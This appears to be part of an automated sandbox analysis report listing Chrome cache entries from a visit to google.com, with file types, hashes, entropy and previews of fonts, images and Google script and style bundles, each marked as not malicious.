Preview:	"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi\|\|{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x30183080, 0x6d, ]);./.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0././. SPDX-License-Identifier: Apache-2.0././.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT./.var ia,aaa,Ga,baa,Ja,cb,sb,eaa,Mb,Rb,Sb,Tb,Ub,Wb,Xb,Yb,ac,faa,gaa,cc,ec,lc,oc,qc,haa,wc,xc,yc,Ec,Mc,Nc,Jc,Kc,Sc,Vc,Xc,ad,bd,Wc,dd,ed,naa,td,ud,vd,oaa,Dd,paa,Hd,qaa,raa,saa,Nd,taa,Wd,ze,Je,He,Ke,y,We,cf,ff,rf,yaa,zaa,Aaa,Baa,wf,Af,Daa,Eaa,Faa,Gaa,Haa,Iaa,Zf,Jaa,Kaa,Laa,wg,Ag,Raa,Paa,Lg,Vaa,Qg,Tg,Xaa,Yaa,Vg,ih,bba,cba,oh,dba,zh,eba,Dh,fba,gba,Rh,Sh,Th,hba,iba,Wh,kba,lba,$h,ai,pba,rba,sba,tba,uba,vba,wba,xba,zba,Aba,Bba,Dba,Eba,aa,ui,vi,Fba,

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 52280, version 1.0
Category:	downloaded
Size (bytes):	52280
Entropy (8bit):	7.995413196679271
Encrypted:	true
SSDEEP:	1536:1rvqtK8DZilXxwJ8mMwAZy7phqsFLdG3B4d:xytBZits8bw4wzbFxG3B4d
MD5:	F61F0D4D0F968D5BBA39A84C76277E1A
SHA1:	AA3693EA140ECA418B4B2A30F6A68F6F43B4BEB2
SHA-256:	57147F08949ABABE7DEEF611435AE418475A693E3823769A25C2A39B6EAD9CCC
SHA-512:	6C3BD90F709BCF9151C9ED9FFEA55C4F6883E7FDA2A4E26BF018C83FE1CFBE4F4AA0DB080D6D024070D53B2257472C399C8AC44EEFD38B9445640EFA85D5C487
Malicious:	false
URL:	https://fonts.gstatic.com/s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2
Preview:	wOF2.......8.....................................^...$..4?HVAR..?MVAR9.`?STAT.',..J/.......`..(..Z.0..R.6.$.... .....K..[..q..c..T.....>.P.j.`.w..#...%......N.".....$..3.0.6......... .L.rX/r[j.y.\|(.4.%#.....2.v.m..-..%.....;-.Y.{..&..O=#l@...k..7g..ZI...#.Z./+T..r7...M..3).Z%.x....s..sL..[A!.51w'/.8V..2Z..%.X.h.o.).]..9..Q`.$.....7..kZ.~O........d..g.n.d.Rw+&....Cz..uy#..fz,(.J....v.%..`..9.....h...?O..:...c%.....6s....xl..#...5..._......1.>.)"U.4 W....?%......6//!$...!.n9C@n...........!""^.....W..Z<.7.x.."UT.T....E.."R>.R..t.....H d..e_.K../.+8.Q.P.ZQ....;...U....]......._.e......71.?.7.ORv.?...l...G\|.P...\|:...I.X..2.,.L........d.g.]}W#uW]QnuP-s.;.-Y.....].......C..j_.M0...y.......J..........NY..@A...,....-.F......'..w./j5g.vUS...U..0.&...y7.LP.....%.....Y......Y..D. e.A..G.?.$.......6...eaK.n5.m...N...,...+BCl..L> .E9~.b[.w.x....6<...}.e...%V....O.......*.?...a..#[eE.4..p..$...].....%......o._......N.._~..El....b..A.0.r8.....\|..D.d..

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	7.8938748179764
Encrypted:	false
SSDEEP:	48:aGmurFSJs329qIqvZO7N4+lRSm+3gdfI8hV92jPH9b45MloqbSHTrpG:4QUvKI7943UJhn2jP3pUG
MD5:	6282A05D151E7D0446C655D1892475E2
SHA1:	B2B05F319DA0E73250200AE9BB518A318D6B4C5D
SHA-256:	4CAB9CF78FD7C85AE2236CDD47B905FA4173F664946DFAB008591B3CFE4280B7
SHA-512:	DF0C4C01555430BD2AFAD409E40A422F5EFB0ED9B6E86168874B46312FFC0BA7CA2B5503E49858035056C342A83CBC42721AA89077BD2E1F698692AF4277BAB5
Malicious:	false
Preview:	.PNG........IHDR...0...0.....W.......IDATx........m.tm.86.m.m...m.Xo..._~..Mm.&..x....v.....?... .~^.TV....z.wK.....-.`..w.............4....."...z6Z."....`;@....!...S.Q..E...L$..`01..S(.v...vn._...H.......H.fs.8).....q....\....9B>...)>#2...A....z..8.#+A.V-..hh....3.......c.......F. 3.......~.^Q......c.....a.1...gZ....y....wU..2...].-.0b].......[......w...&K..$..K..\.t..QoY..O?....u.Sa.-...na.Z..}..._s..~[.Ue.M.!#Y.....%.t.7y....J......Q.0fC.Fo..@..&...B.....&..}.ld....O.#+...<.z..,."?vC....Y.....<d..."b.D.(sX..c..5.z,..!...oV.. .....>O.#..pHG..y.j.7.-@.K.s..,...&.%6.. O=dj....S..;.O..ylc.O.~....Tn.F.\|.Y..X..@........e..O.Z......}(H...vp.... ...y..&..:.......8y...{n..R^...:.q.......>....C.....^P..C..%..<. 6...9..,.$0x.M.=.`\..MI..\|.........^...W-"...@..J........K.m...h...x.H.>.c.>.w!......:X.b%.v....)..[R..-..>.+!..?...?.....Q.G:F...k..A.)`*.^N$...{9.<.PD...7`).3.d........h.k..{]&.;^.h.s>BREP.X.O.~P\|[....R].m,.......Z..Pk.g0.yl...Z.qp..

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1689), with no line terminators
Category:	dropped
Size (bytes):	1689
Entropy (8bit):	5.640520027557763
Encrypted:	false
SSDEEP:	48:ifKf9wIe7P3SJgX4DW45JUzBG/t5JUTLF5Jv325Jvhv:5De7Pn4DW+Go3GnXdcHv
MD5:	45DD7BD58C9F085DA52FA16A2A150066
SHA1:	9B5CF4B288EDE14AE8834F3EF2A58145B8EC8CBC
SHA-256:	0D5C53FCC37C7A2CE26367BBE6197FCD9272DD7EBC81823D088A4DFFF5AE599B
SHA-512:	520B8DF68524C2CEF393B837D7EAD0168028C94697E1DA0AC4BDDAFAB849D1B26D7E7933082146AE6A220A449F066CBBBA2EBFC6CC30D3F756FBD98EE061C8DF
Malicious:	false
Preview:	.MTIaKb,.LwDUdc,.FAoEle,.RlTCPd,.wPNfjb,.caNvfd,.Vnob4b,.bbxTBb,.DpgmK,.YKUhfb,.uNnvb,.aVsZpf,.RoOVmf,.dIfvQd,.V3Ezn,.Enb9pe,.mYuoaf,.kJSB8,.tUr4Kc,.iQMtqe{--Yi4Nb:var(--mXZkqc);--pEa0Bc:var(--bbQxAb);--kloG3:var(--mXZkqc);--YaIeMb:var(--XKMDxc);--Pa8Wlb:var(--Nsm0ce);--izGsqb:var(--Nsm0ce);--todMNcl:var(--EpFNW);--p9J9c:var(--Nsm0ce)}:root{--KIZPne:#a3c9ff;--xPpiM:#001d35;--Ehh4mf:var(--Nsm0ce)}:root{--Yi4Nb:#d2d2d2;--pEa0Bc:#474747;--kloG3:#d2d2d2;--YaIeMb:#f7f8f9;--Pa8Wlb:#0b57d0;--izGsqb:#0b57d0;--todMNcl:#fff;--p9J9c:#0b57d0}.EpPYLd{display:block;position:relative}.YpcDnf{padding:0 16px;vertical-align:middle}.YpcDnf.HG1dvd{padding:0}.HG1dvd>*{padding:0 16px}.WtV5nd .YpcDnf{padding-left:28px}.Zt0a5e .YpcDnf{line-height:48px}.GZnQqe .YpcDnf{line-height:23px}.EpPYLd:hover{cursor:pointer}.EpPYLd,.CB8nDe:hover{cursor:default}.LGiluc,.EpPYLd[disabled]{pointer-events:none;cursor:default}@media (forced-colors:active){.EpPYLd[disabled]{color:GrayText}}.LGiluc{border-top:1px solid;height:0;

Chrome Cache Entry: 122

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (14271)
Category:	downloaded
Size (bytes):	205522
Entropy (8bit):	5.882054255691725
Encrypted:	false
SSDEEP:	3072:zE+3bOi+00jZoUIMy/AgEJs2IN7AwtN+ek/jEN:zE+3bA00jZjIMyIgEJvINYEN
MD5:	6DF16316CCE007949FD6BD7F1496A348
SHA1:	A3F470F00875DFF91089B0477675FFEFEDDA89C7
SHA-256:	BD3BA946A02F8BEA62DAACA0E182827F60880F9A2E6C9F2787273DEBE458BC89
SHA-512:	D2FB5A6969B3BFFAF7836CC6AB595C2C41C71F3EBFC442513AE66B1D5FB1CBF91622C021A9379B0924E92C6D4233328057BAB7C11E4A2824A1F5B21BA0363887
Malicious:	false
URL:	https://www.google.com/
Preview:	<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="Anm+hhtuh7NJguqSnXHEAIqqMaV+GXCks8WYXHJKF7l6AeYMj+wO+fi9OdDqFnJTg9t0492DykVxx4jpvFbxnA8AAABseyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IlByaXZhY3lTYW5kYm94QWRzQVBJcyIsImV4cGlyeSI6MTY5NTE2Nzk5OSwiaXNTdWJkb21haW4iOnRydWV9" http-equiv="origin-trial"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="PJjfH0QIYqHhg86xOxlZmQ">window._hst=Date.now();</script><script nonce="PJjfH0QIYqHhg86xOxlZmQ">(function(){var _g={kEI:'QVhbZ6XKF6u3i-gP-ZzZoAs',kEXPI:'31',kBL:'D9Ku',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){.var g=this\|\|self;function k(){return window.google&&window.google.kOPI\|\|null};var l,m=[];

Chrome Cache Entry: 123

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	5430
Entropy (8bit):	3.6534652184263736
Encrypted:	false
SSDEEP:	48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
MD5:	F3418A443E7D841097C714D69EC4BCB8
SHA1:	49263695F6B0CDD72F45CF1B775E660FDC36C606
SHA-256:	6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
SHA-512:	82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
Malicious:	false
Preview:	............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................

Chrome Cache Entry: 124

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (7763), with no line terminators
Category:	downloaded
Size (bytes):	7763
Entropy (8bit):	5.487881965048697
Encrypted:	false
SSDEEP:	192:9PLgsZJMQVd8c561Y9WAkz5ikKd4fjhLIdhw:9DgsZJMQVdJ9WAkz8cLIdm
MD5:	F30A7D3053B1444A61A36FA16A8F9DC1
SHA1:	0071E0CCD4ADE376B83BE785B87511E5AD0B20FB
SHA-256:	51A8EC86F79AC147525D9B2968DA000C45F2A9BFAEE543A2016F5469285B14C8
SHA-512:	8FD2BC326733175DB8E45A7B5CEC76CAEFF553276E1DECE1906E2F5695B35E3818216304DCD793B607AC2209707906B67D06DAFD218AC9466B0FF504DF69FC5A
Malicious:	false
URL:	"https://www.google.com/xjs/_/ss/k=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/d=1/ed=1/br=1/rs=ACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi"
Preview:	:root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#d2d2d2;--EpFNW:#fff;--IXoxUe:#5e5e5e;--bbQxAb:#474747;--YLNNHc:#1f1f1f;--TMYS9:#0b57d0;--JKqx2:#1a0dab;--rrJJUc:var(--Nsm0ce);--mXZkqc:#d2d2d2;--Nsm0ce:#0b57d0;--XKMDxc:#f3f5f6;--aYn2S:#f3f5f6;--Lm570b:#dee1e3}.ABMFZ.B05RBb{transition:background-color 100ms,visibility 0s 0s;visibility:inherit;background-color:rgba(0,0,0,0.6)}.ABMFZ{transition:background-color 100ms,visibility 0s 250ms;position:fixed;visibility:hidden;inset:0}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{animation:qli-container-rotate 1568.2352941176ms linear infinite}@keyframes qli-container-rotate{from{transform:rotate(0)}to{transform:rotate(1turn)}}.RoKmhb{height:1

Chrome Cache Entry: 125

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (621)
Category:	dropped
Size (bytes):	1151965
Entropy (8bit):	5.697651827473428
Encrypted:	false
SSDEEP:	24576:I0Bto2UfK/vA5Qyqccyh8DN2pLZUMq2zUE0EjQXk0Y3eKOI059E:I0Bto2UfK/vA5QyqcH4NoUMJzUE0EjQQ
MD5:	0CB57D51E71625510D77A50F11063B5C
SHA1:	993D8A287CDCBB88749FE1DD1F77976105FFBD99
SHA-256:	0C69A1386A2EAB4E9FC5FAC70852EE88CC55A496E263F8C102DA53FFA2B66724
SHA-512:	9610291BD1084971917ACDF095F4715E637C79B4F2B8E27FAE821D84212C08D2A42B31EAFB06AF429F535B69B7F9115E1D2102F8340865AA9BEC1965354BFF9C
Malicious:	false
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{./.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0././.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT././. SPDX-License-Identifier: Apache-2.0././. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var baa,caa,iaa,uaa,waa,Baa,Kaa,Paa,Yaa,$aa,cba,gba,hba,lba,qba,rba,nba,oba,wba,xba,Bba,Eba,Fba,Dba,Gba,Iba,yba,db,Jba,Kba,Oba,Pba,Qba,Uba,Yba,Zba,aca,bca,cca,eca,fca,hca,lca,nca,yca,zca,Aca,Bca,Cca,vca,Dca,sca,Eca,rca,tca,uca,Fca,Gca,Hca,Jca,Sca,Tca,Xca,Yca,bda,eda,Zca,dda,cda,ada,$ca,fda,gda,hda,jda,oda,pda,xda,yda,zda,Ada,Bda,Cda,qda,Dda,Gda,Ida,Hda,Kda,Mda,Lda,Oda,Nda,Rda,Qda,Sda,Wda,Xda,$da,bea,eea,fea,iea,zb,oea,rea,wea,zea,Aea,Cea,hea,kea,Eea,Iea,Oea,Lb,Sea,Vea,Uea,bfa,dfa,efa,hfa,kfa,lfa,.nfa,Bfa,Efa,Ffa,Gfa,Hfa,Ofa,Tfa,Vfa,aga,cga,dga,ega,fga,gga,hga,lga,nga,qga,sga,tga,vga,yga,zga,Bga,

Chrome Cache Entry: 126

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (940)
Category:	dropped
Size (bytes):	380831
Entropy (8bit):	5.568609564061166
Encrypted:	false
SSDEEP:	3072:bMuJ+ohhBRDwI98lHpIZ0IRFUe/iXxlj6DZGCbYanH5auePjK:bV+2BRvmwqeaXxl6GCTH4u9
MD5:	6BADF95C928A30571DFFDFAABCD631D1
SHA1:	5EECEED3E7349B0AD5733BB438FEC9445CAA8217
SHA-256:	B65DF39A549B53539029968DC3D93D0503B9DEF7BA66104524EA13A8EB61161B
SHA-512:	140552AF6900D9E84B9B86AB332B2EC005BD5E03FA75133ADEDF615D69E00A46A9810A51A52396F808AD866BE4DAACB70BF345FA9B80E4A8F82C5483EC57A22C
Malicious:	false
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{._.y("sb_wiz");.._.z();.}catch(e){_._DumpException(e)}.try{._.y("aa");.._.z();.}catch(e){_._DumpException(e)}.try{._.y("abd");.var Pfi=function(a){for(var b="",c=21,d=0;d<a.length;d++)d%4!=3&&(b+=String.fromCharCode(a[d]^c),c++);return b},Qfi=function(a){var b=0,c;for(c in a)if(a[c].e)if(a[c].b)b++;else return!1;return b>0},Vfi=function(a){a=a===void 0?{}:a;var b={};b[Rfi]={e:!!a[Rfi],b:!_.rpc(Sfi)};b[Tfi]={e:!!a[Tfi],b:!_.rpc(Ufi)};return b},Wfi=function(a){var b=[],c;for(c in a)a[c].e&&b.push(c+":"+(a[c].b?"1":"0"));return b.join(",")},Yfi=function(a,b){a=String(a);b&&(a+=","+b);google.log(Xfi,a)},Zfi=function(a,b,c){c=.c===void 0?2:c;if(c<1)Yfi(7,b);else{var d=new Image;d.onerror=function(){Zfi(a,b,c-1)};d.src=a}},Sfi=Pfi([97,119,115,111,107]),Ufi=Pfi([97,119,115,111,107,123]),$fi=Pfi([118,115,121,107,108,124,104,119,68,127,114,105,114]),Xfi=Pfi([101,126,118,102,118,125,118,109,126]),agi=Pfi([116,116,115,108]),Rfi=Pfi([113,115,

Chrome Cache Entry: 127

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	101
Entropy (8bit):	5.228956939596933
Encrypted:	false
SSDEEP:	3:V2JVVjU4JkWJUkDZHG6JElJWdHZ+4LQpNYe:V2bu4JxZLJkWdHAHpue
MD5:	E4FC6AD323DFBBA3CA15674743166D19
SHA1:	E6A437A3D02084ECC6690125EDAE0535B4BD5287
SHA-256:	FA533C21A86B2715C7D0F906B6C0D874246F22FAD214B57E7C12C41F8BAD42BB
SHA-512:	E920C003340429CAA5F5889A56050A412F80D74EC5FD6621C66F0C5E0EFAE889E7E99CC95F09631E04F46016D728292B5E572C39CF37AF50A3A67BD20AA85222
Malicious:	false
Preview:	)]}'.21;["VlhbZ875KPKHxc8Pq6XRUA","2131"]c;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;

Chrome Cache Entry: 128

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2412)
Category:	downloaded
Size (bytes):	224359
Entropy (8bit):	5.521835891976893
Encrypted:	false
SSDEEP:	6144:NpUnD13gK23Cj+rn4huSzGZh4x52BygBWk253BBpBzjZpdDeUyQzTkH9znoIpnKb:NpgD13gK23Cirn4huSzGZh4x52ByyF2F
MD5:	F31AF21B5201286A4BF1F5F9B07A85C7
SHA1:	6D37077A4BB95D77E312978F97CA9C2B187BD460
SHA-256:	8BE1D7E132DE39D1499033527127303B2931B7D7833128695F5F8F0E12384456
SHA-512:	6374654E0B367423401F2688946E09E199EC34E6D9DE17550D4F0438D2897EF6B9772054344C99134F2B32963E8A6D6294E4861B24B3C63F9298CD1855D86229
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.kK1dM3um3so.2019.O/rt=j/m=qabr,q_d,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/rs=AA2YrTvy5aateSbmVFHM0FBRaHBJsFE_CQ"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Fd=typeof AsyncContext!=="undefined"&&typeof AsyncContext.Snapshot==="function"?a=>a&&AsyncContext.Snapshot.wrap(a):a=>a;.}catch(e){_._DumpException(e)}.try{._.ye=function(a){return _.Kb(a)&&a.nodeType==1};_.ze=function(a,b){if("textContent"in a)a.textContent=b;else if(a.nodeType==3)a.data=String(b);else if(a.firstChild&&a.firstChild.nodeType==3){for(;a.lastChild!=a.firstChild;)a.removeChild(a.lastChild);a.firstChild.data=String(b)}else _.ve(a),a.appendChild(_.le(a).createTextNode(String(b)))};var Ae;_.Be=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));const d="aria-"+b;c===""\|\|c==void 0?(Ae\|\|(Ae={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=Ae,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};var Fe;_.Ee=func

Chrome Cache Entry: 129

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (738)
Category:	dropped
Size (bytes):	29656
Entropy (8bit):	5.406135809851131
Encrypted:	false
SSDEEP:	768:eJXCo24pgJbYH5qjhjCd0FMYF/rjhva+sSGVimetltFQFLuqixyfpEYYAAoaVv/J:YXCo2FjNxhSExy2Yygfzq
MD5:	690F96BA16BC36422BCD78F06C475528
SHA1:	EDA7E57CA609F351066CE989EE33B03546453F90
SHA-256:	08B431CCA8C904AA60BF13EE4D307550FBC41F6D268C7AAE398FD030A2400411
SHA-512:	87C128F9777358A0643FAD66B9C0732E99451EEA6AA1117063A130B89C89B9C505E7BB19DBBB3FA83360E7DF779236384C3015F5AEACB43E012401B0573D5CEC
Malicious:	false
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{._.aec=_.Md("VsqSCc",[]);.}catch(e){_._DumpException(e)}.try{.var Wdc;_.Ydc=function(a){return Wdc("https://www.facebook.com/dialog/share",{app_id:"738026486351791",href:_.Xdc(a),hashtag:"#GoogleDoodle"})};_.Zdc=function(a){return Wdc("https://twitter.com/intent/tweet",{text:a})};_.$dc=function(a,b){return Wdc("mailto:",{subject:a,body:b})};_.Xdc=function(a){var b=a;b&&b.indexOf("//")===0&&(b="https:"+a);return b};Wdc=function(a,b){var c=new _.qn,d;for(d in b)c.add(d,b[d]);a=new _.mh(a);_.mn(a,c);return a.toString()};.}catch(e){_._DumpException(e)}.try{._.y("VsqSCc");.var bec=function(a){1!=a.Qgb&&_.wob(a,!0)},cec=function(a){a.ewb=!1;_.xob(a,!1)},dec=function(){_.Yd.call(this);var a=this;this.dialog=new _.ys("ddlshare-dialog");this.dialog.eKa(!1);_.Aob(this.dialog,!0);this.dialog.d4a=!0;_.Bob(this.dialog);bec(this.dialog);cec(this.dialog);_.vob(this.dialog,.95);this.Zc=new _.Fm(this);this.ka=new _.xTa;_.Ee("ddle","0",!0);_.Be("dd

Chrome Cache Entry: 130

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3899)
Category:	dropped
Size (bytes):	118881
Entropy (8bit):	5.714253851019467
Encrypted:	false
SSDEEP:	1536:aPlunKLV8eCO8V8OLHVKTFQrFADJrZEDFiUPGZ+bBdkJmmI6b5+h+o:kE0CNO+ruDJr+DuZ+1dUbC
MD5:	EAB020600F510361F88605A036877B0A
SHA1:	4843848F3946B852EC269520BEFEB3F60605F50E
SHA-256:	7E893C9803E288893FD7C8CEAEA360F3AC6341E3A69C802FCB045E989AE7E2EC
SHA-512:	8EFED6F0E07AFEA313DEFBC0D027C1070B3D22AE63AFF8E8E27CAB0653EC13710ECF76C02615B9C884D48D847AFCC83D58B2B4200737E1340A8B315307821454
Malicious:	false
Preview:	_F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.ea0Lbe{background:#fff;border-radius:24px;box-shadow:0px 4px 6px rgba(32,33,36,0.28);margin-left:-4px;margin-top:0;position:absolute;top:-4px;width:calc(100% + 8px);z-index:989}.KoWHpd{margin:20px}.BiKNf{align-self:flex-end;cursor:pointer;display:flex;padding:14px;position:absolute;right:6px;top:6px}.p4pvTd{color:rgb(32,33,36);font-family:\"Google Sans Display\",Roboto,Arial,sans-serif;font-size:16px;font-weight:normal;line-height:28px;margin:0 0 14px;text-align:center;letter-spacing:.1px}.BH9rn{align-items:center;display:inline-flex;flex-direction:row;flex-grow:1;justify-content:normal;padding-top:16px}.gIYJUc{background:rgb(248,249,250);border:1px dashed #c0c0c0;border-radius:8px;box-sizing:border-box;display:flex;flex-direction:column;flex-grow:1;height:280px;position:relative;width:100%}.Ndj4R{border:1px dashed #c0c0c0}.id5vMb{border:1px dashed #c0c0c0}.f6GA0{heig

Chrome Cache Entry: 131

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (940)
Category:	downloaded
Size (bytes):	380831
Entropy (8bit):	5.568609564061166
Encrypted:	false
SSDEEP:	3072:bMuJ+ohhBRDwI98lHpIZ0IRFUe/iXxlj6DZGCbYanH5auePjK:bV+2BRvmwqeaXxl6GCTH4u9
MD5:	6BADF95C928A30571DFFDFAABCD631D1
SHA1:	5EECEED3E7349B0AD5733BB438FEC9445CAA8217
SHA-256:	B65DF39A549B53539029968DC3D93D0503B9DEF7BA66104524EA13A8EB61161B
SHA-512:	140552AF6900D9E84B9B86AB332B2EC005BD5E03FA75133ADEDF615D69E00A46A9810A51A52396F808AD866BE4DAACB70BF345FA9B80E4A8F82C5483EC57A22C
Malicious:	false
URL:	"https://www.google.com/xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/ck=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/ujg=1/rs=ACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog/m=sb_wiz,aa,abd,sy17o,syfz,syfr,syfp,syfq,syfs,syg0,syg1,syfw,syfv,syfu,syep,syft,syfj,syfi,syfk,syfh,syfm,sy16j,sygb,sy17m,syyl,syga,syg9,syg8,async,ifl,pHXghd,sf,syig,sy3kp,sonic,sy3kv,syhl,syh1,sy3k7,sy3ka,sy274,sye3,sy9u,sy9f,sy9e,sy9c,spch,syti,syth,rtH1bd,sy19k,sy15l,sy151,sy12b,sydb,sy19i,SMquOb,sy7k,sy7j,syf3,syfe,syfc,syfb,syf2,syf0,syey,sy86,sy83,sy85,syex,syf1,syew,sybg,syb9,sybc,syaj,syap,syai,syah,syag,sya4,syba,syax,syay,syb4,syan,syb3,syaw,syat,syae,syal,syaz,sya6,sya8,sya9,sya5,syao,syad,syaa,sybj,sya0,sy9x,sybi,sy9p,sy9h,sy9k,sy9w,sya3,syb0,syev,syeu,syer,syeq,sy89,uxMpU,syem,sybq,sybo,sybk,syar,sybm,sybh,sy8n,sy8m,sy8l,sy8k,Mlhmy,QGR0gd,aurFic,sy8w,fKUV3e,OTA3Ae,sy7l,OmgaI,EEDORb,PoEs9b,Pjplud,sy8h,A1yn5d,YIZmRd,uY49fb,sy7b,sy79,sy75,sy78,sy77,sy76,byfTOb,lsjVmc,LEikZe,kWgXee,ovKuLd,sgY6Zb,sy8v,sy8y,sy88,xUdipf,NwH0H,gychg,ZfAoz,yDVVkb,qafBPd,ebZ3mb,dowIGb,sy19n,sy19l,syxi,sytn,d5EhJe,sy1a5,fCxEDd,syut,sy1a4,sy1a3,sy1a2,sy19u,sy19r,sy19s,sy17b,sy175,syx6,syx5,T1HOxc,sy19t,sy19q,zx30Y,sy1a7,sy1a6,sy19y,sy15y,Wo3n8,sysz,loL8vb,syt3,syt2,syt1,ms4mZb,sys1,B2qlPe,syue?xjs=s3"
